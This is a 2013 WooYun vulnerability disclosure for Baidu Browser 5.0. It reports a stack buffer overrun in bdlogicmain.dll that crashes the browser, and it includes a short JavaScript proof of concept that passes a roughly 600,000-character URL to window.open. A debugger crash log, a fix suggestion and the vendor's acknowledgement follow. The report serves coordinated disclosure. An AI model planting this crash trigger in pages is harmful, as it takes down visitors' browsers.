漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-036295
漏洞标题:百度浏览器5.0正式版(2.200.0.41563)拒绝服务漏洞
相关厂商:百度
漏洞作者: blast
提交时间:2013-09-06 18:05
修复时间:2013-12-05 18:05
公开时间:2013-12-05 18:05
漏洞类型:拒绝服务
危害等级:中
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-06: 细节已通知厂商并且等待厂商处理中
2013-09-08: 厂商已经确认,细节仅向厂商公开
2013-09-11: 细节向第三方安全合作伙伴开放
2013-11-02: 细节向核心白帽子及相关领域专家公开
2013-11-12: 细节向普通白帽子公开
2013-11-22: 细节向实习白帽子公开
2013-12-05: 细节向公众公开
简要描述:
bdlogicmain.dll缓冲区溢出导致拒绝服务 我猜是strncpy那儿没弄好?STATUS_STACK_BUFFER_OVERRUN encountered
(272c.2070): WOW64 breakpoint - code 4000001f (first chance)
详细说明:
<script>
var s="A";
var i=1;
for(i=1;i<599559;i++)
s+="A";
window.open(s);
</script>
我猜是实际缓存1024字节,但是strncpy复制的URL太长了然后就Unhandled Exception了?
漏洞证明:
0:063> g
ModLoad: 00000000`705f0000 00000000`705f8000 C:\Windows\SysWOW64\credssp.dll
ModLoad: 00000000`5ea70000 00000000`5eaa1000 EhStorAPI.DLL
ModLoad: 00000000`5ea70000 00000000`5eaa1000 C:\Windows\SysWOW64\EhStorShell.dll
ModLoad: 00000000`04080000 00000000`04094000 C:\Program Files (x86)\Common Files\ScmClient\ScmClient_Shell.DLL
ModLoad: 00000000`712c0000 00000000`7131f000 C:\Windows\SysWOW64\SXS.DLL
ModLoad: 00000000`704b0000 00000000`704ef000 C:\Windows\SysWOW64\schannel.dll
ModLoad: 00000000`726a0000 00000000`726d8000 C:\Windows\SysWOW64\ncrypt.dll
ModLoad: 00000000`72680000 00000000`72697000 C:\Windows\SysWOW64\bcrypt.dll
ModLoad: 00000000`72640000 00000000`7267d000 C:\Windows\SysWOW64\bcryptprimitives.dll
STATUS_STACK_BUFFER_OVERRUN encountered
(272c.2070): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for KERNEL32.dll -
KERNEL32!GetProfileStringW+0x129fd:
757cff99 cc int 3
修复方案:
检查输入长度
版权声明:转载请注明来源 blast@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:4
确认时间:2013-09-08 22:32
厂商回复:
感谢对百度安全的关注,我们马上处理此问题。
--“百度,因你更安全”
最新状态:
暂无